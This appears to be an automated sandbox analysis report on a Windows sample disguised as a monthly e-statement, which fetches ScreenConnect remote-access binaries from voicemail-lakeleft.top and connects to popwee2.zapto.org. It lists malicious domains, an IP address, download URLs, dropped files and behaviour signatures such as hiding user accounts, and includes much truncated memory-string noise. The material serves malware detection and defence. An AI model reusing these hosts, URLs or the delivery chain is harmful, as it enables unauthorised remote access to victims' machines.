                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551950 Sample: monthly-eStatementForum1204... Startdate: 08/11/2024 Architecture: WINDOWS Score: 51 46 voicemail-lakeleft.top 2->46 48 popwee2.zapto.org 2->48 50 3 other IPs or domains 2->50 58 .NET source code references suspicious native API functions 2->58 60 Detected potential unwanted application 2->60 62 Contains functionality to hide user accounts 2->62 64 AI detected suspicious sample 2->64 9 monthly-eStatementForum120478962.Client.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2->11         started        14 svchost.exe 8 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 19 dfsvc.exe 129 109 9->19         started        23 WerFault.exe 19 16 9->23         started        68 Reads the Security eventlog 11->68 70 Reads the System eventlog 11->70 25 ScreenConnect.WindowsClient.exe 11->25         started        28 WerFault.exe 2 14->28         started        44 127.0.0.1 unknown unknown 16->44 signatures6 process7 dnsIp8 52 popwee2.zapto.org 194.59.30.201, 443, 49705, 49711 COMBAHTONcombahtonGmbHDE Germany 19->52 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 42 13 other files (none is malicious) 19->42 dropped 30 ScreenConnect.WindowsClient.exe 19 11 19->30         started        66 Contains functionality to hide user accounts 25->66 file9 signatures10 process11 signatures12 72 Contains functionality to hide user accounts 30->72 33 ScreenConnect.ClientService.exe 30->33         started        process13 signatures14 54 Contains functionality to hide user accounts 33->54 56 Enables network access during safeboot for specific services 33->56

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config:0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationYDataer0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationX0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll~0%Avira URL Cloudsafe
                  http://voicemail-lakeleft.top0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application%0%Avira URL Cloudsafe
                  https://login.ecur0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll60%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_ecture=msil;0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreeP0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationY;0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowVF0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationg=0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationO$0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationre=msil0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exeG0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_4c015cY0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exed0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  voicemail-lakeleft.top
                  194.59.30.201
                  truefalse
                    unknown
                    bg.microsoft.map.fastly.net
                    199.232.214.172
                    truefalse
                      high
                      popwee2.zapto.org
                      194.59.30.201
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dllfalse
                            high
                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dllfalse
                              high
                              https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                high
                                https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dllfalse
                                  high
                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                                    high
                                    https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exefalse
                                      high
                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifestfalse
                                        high
                                        https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                          high
                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exefalse
                                            high
                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                                              high
                                              https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exefalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://schemas.xmlsoap.org/ws/2005/02/sc.comsvchost.exe, 00000007.00000002.3288771862.0000021CA2737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationYDataerdfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-8svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://account.live.com/msangcwamvicesvchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2070539133.0000016BAB740000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                                                        high
                                                        https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://Passport.NET/tbAsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zaptS5L60WDT.log.2.drfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000007.00000003.2247242925.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2211022757.0000021CA270F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180029091.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2247172340.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159753613.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230521797.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230497548.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261678290.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288647499.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2180103259.0000021CA2710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2195977302.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261895175.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2230100183.0000021CA2708000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159831592.0000021CA270E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2210994178.0000021CA2707000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2159724549.0000021CA270E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2004/09/policycsvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientSerdfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Cdfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAsvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config:dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll~dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000002.00000002.2973425425.0000025D1D6CA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3289893133.0000000001FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://Passport.NET/tb_svchost.exe, 00000007.00000002.3289318932.0000021CA2E48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://ns.adobe.cdfsvc.exe, 00000002.00000002.2981098182.0000025D365DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://account.live.com/msangcwamsvchost.exe, 00000007.00000003.2075651104.0000021CA2757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075221311.0000021CA2752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075138929.0000021CA2729000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.w3.ordfsvc.exe, 00000002.00000002.2973425425.0000025D1DCD6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DD3C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DCB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.ver)svchost.exe, 00000006.00000002.3290128804.0000016BAB800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://passport.net/tbsvchost.exe, 00000007.00000002.3289021215.0000021CA2E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287754329.0000021CA1E81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288225105.0000021CA1EEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3289318932.0000021CA2E48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustf1psvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuesvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application%dfsvc.exe, 00000002.00000002.2983530978.0000025D396A1000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447348607.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2450614110.000000001B870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Windodfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll6dfsvc.exe, 00000002.00000002.2981524853.0000025D37CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000007.00000002.3288119180.0000021CA1ED3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://voicemail-lakeleft.topdfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://login.ecursvchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://account.live.com/Wizard/Password/Change?id=806014svchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://voicemail-lakeleft.topdfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DE0A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DA82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applScreenConnect.WindowsClient.exe, 00000009.00000002.2447543283.00000000014B4000.00000004.00000020.00020000.00000000.sdmp, S5L60WDT.log.2.drfalse
                                                                                                                      high
                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2982317556.0000025D39540000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2981642219.0000025D37CFE000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2972728761.0000025D1BCD3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447762978.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2450825979.000000001B8AA000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2446849268.000000000116F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451144546.000000001B8F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applications_ecture=msil;dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/scrsvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2179818124.0000021CA2729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.2075672208.0000021CA2740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075626421.0000021CA273B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3287725423.0000021CA1E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2075692660.0000021CA2763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://Passport.NET/STSsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288974321.0000021CA2782000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000007.00000002.3287690750.0000021CA1E47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreePdfsvc.exe, 00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000002.00000002.2973425425.0000025D1D740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://docs.oasis-open.org/wss/28svchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAsvchost.exe, 00000007.00000003.2195961016.0000021CA2776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2196025067.0000021CA2779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuelssvchost.exe, 00000007.00000002.3288859808.0000021CA275F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.w3.odfsvc.exe, 00000002.00000002.2973425425.0000025D1DCB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
